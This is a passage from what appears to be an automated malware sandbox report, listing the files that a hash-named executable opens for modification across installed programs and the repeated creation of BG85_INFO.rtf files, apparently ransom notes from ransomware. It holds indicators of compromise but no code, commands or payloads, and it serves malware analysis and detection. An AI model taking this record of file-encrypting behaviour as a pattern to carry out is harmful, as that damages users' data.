Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.flightrecorder_5.5.0.165303\feature.properties c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files (x86)\MSBuild\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\MET c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\triggerActionExceptionHandlers.exsd c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.core.contexts_1.3.100.v20140407-1019.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT+8 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.artifact.repository.nl_ja_4.4.0.v20140623020002.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core-multitabs_ja.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-application-views.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-sa.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\MDIParent.zip c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Indiana\Winamac c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Recife c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\locale\mai\LC_MESSAGES\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.simpleconfigurator.manipulator.nl_ja_4.4.0.v20140623020002.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-autoupdate-services.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-core.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Mozilla Firefox\uninstall\shortcuts_log.ini c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\bn\LC_MESSAGES\vlc.mo c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\cmm\LINEAR_RGB.pf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\ext\meta-index c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Indiana\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\et\LC_MESSAGES\vlc.mo c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_zh_4.4.0.v20140623020002\eclipse_update_120.jpg c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\EET c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\pa\LC_MESSAGES\vlc.mo c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.e4.rcp_1.3.100.v20141007-2033\feature.properties c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\license.html c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.flightrecorder.configuration_5.5.0.165303.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes.nl_ja_4.4.0.v20140623020002.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\uk\LC_MESSAGES\vlc.mo c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\java-rmi.exe c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\klist.exe c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.console_5.5.0.165303\feature.properties c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\North_Dakota\Beulah c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Irkutsk c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Karachi c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\epl-v10.html c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.preferences_3.5.200.v20140224-1527.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\Explorer.zip c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\bin\setNetworkClientCP c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Argentina\Ushuaia c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\ext\dnsns.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\ro.pak c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Windows Mail\en-US\msoeres.dll.mui c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files (x86)\Google\Update\1.3.35.452\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\org-openide-util.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-keyring_zh_CN.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-host-views_ja.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\es\LC_MESSAGES\vlc.mo c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\VideoLAN\VLC\plugins\plugins.dat c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\lua\http\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.di.nl_ja_4.4.0.v20140623020002.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\ext\locale\updater_ja.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT-1 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\zh-TW.pak c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Shanghai c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.commands.nl_ja_4.4.0.v20140623020002.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.win32.nl_zh_4.4.0.v20140623020002.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\org-netbeans-lib-profiler-charts.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\jsse.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT-5 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\pl\LC_MESSAGES\vlc.mo c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Danmarkshavn c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.extensionlocation.nl_zh_4.4.0.v20140623020002.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winXPOlive.png c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Riga c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\ext\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Bucharest c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\META-INF\ECLIPSE_.RSA c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Windows Journal\en-US\NBMapTIP.dll.mui c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Colombo c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\META-INF\MANIFEST.MF c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\org-netbeans-modules-profiler-utilities.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Hebron c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\ReceiveOpen.mpg c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\management\snmp.acl.template c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.browser.jdp.ja_5.5.0.165303.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench.renderers.swt.nl_ja_4.4.0.v20140623020002.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\nl\LC_MESSAGES\vlc.mo c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\cryptocme2.sig c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\locale\th\LC_MESSAGES\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Monterrey c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.core\cache\binary\com.jrockit.mc.rcp.product_root_5.5.0.165303 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-editor-mimelookup_ja.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\css\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-editor-mimelookup_zh_CN.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Dawson c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Dublin c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\requests\playlist.json c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Toronto c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.flightrecorder.ui_5.5.0.165303.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\indxicon.gif c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\bin\javaw.exe c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\jps.exe c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\wsgen.exe c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Indiana\Petersburg c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInAcrobat.gif c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\javafxpackager.exe c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\keytool.exe c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\management-agent.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Mozilla Firefox\precomplete c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\mobile_browse.html c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\locale\ja\LC_MESSAGES\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\locale\ky\LC_MESSAGES\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\locale\ru\LC_MESSAGES\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\AboutBox.zip c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\com.jrockit.mc.rjmx.syntheticattribute.exsd c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\content-types.properties c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoAcq.dll.mui c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Phoenix c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Indian\Christmas c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\Workflow.VisualBasic.Targets c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\sw.pak c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Installer\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\include\win32\bridge\AccessBridgeCallbacks.h c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.http.registry_1.1.300.v20130402-1529.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-swing-outline.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\bin\java.exe c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\ext\locale\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Metlakatla c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jre7\lib\deploy\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\jinfo.exe c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.core.commands_0.10.2.v20140424-2344.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-compat_ja.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annots.api c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm.api c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\ICU\icudt26l.dat c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\Resources\1033\msmdsrv.rll c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Atlantic\Reykjavik c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Baghdad c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.flightrecorder_5.5.0.165303\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\Cartridges\Sybase.xsl c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\MST c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Urumqi c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\jamendo.luac c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\SetupMetrics\20200722114921.pma c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\lib\derby.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\images\cursors\win32_CopyDrop32x32.gif c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Belem c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Resolute c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\db\bin\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\bin\jabswitch.exe c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Indiana\Indianapolis c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\EmptyDatabase.zip 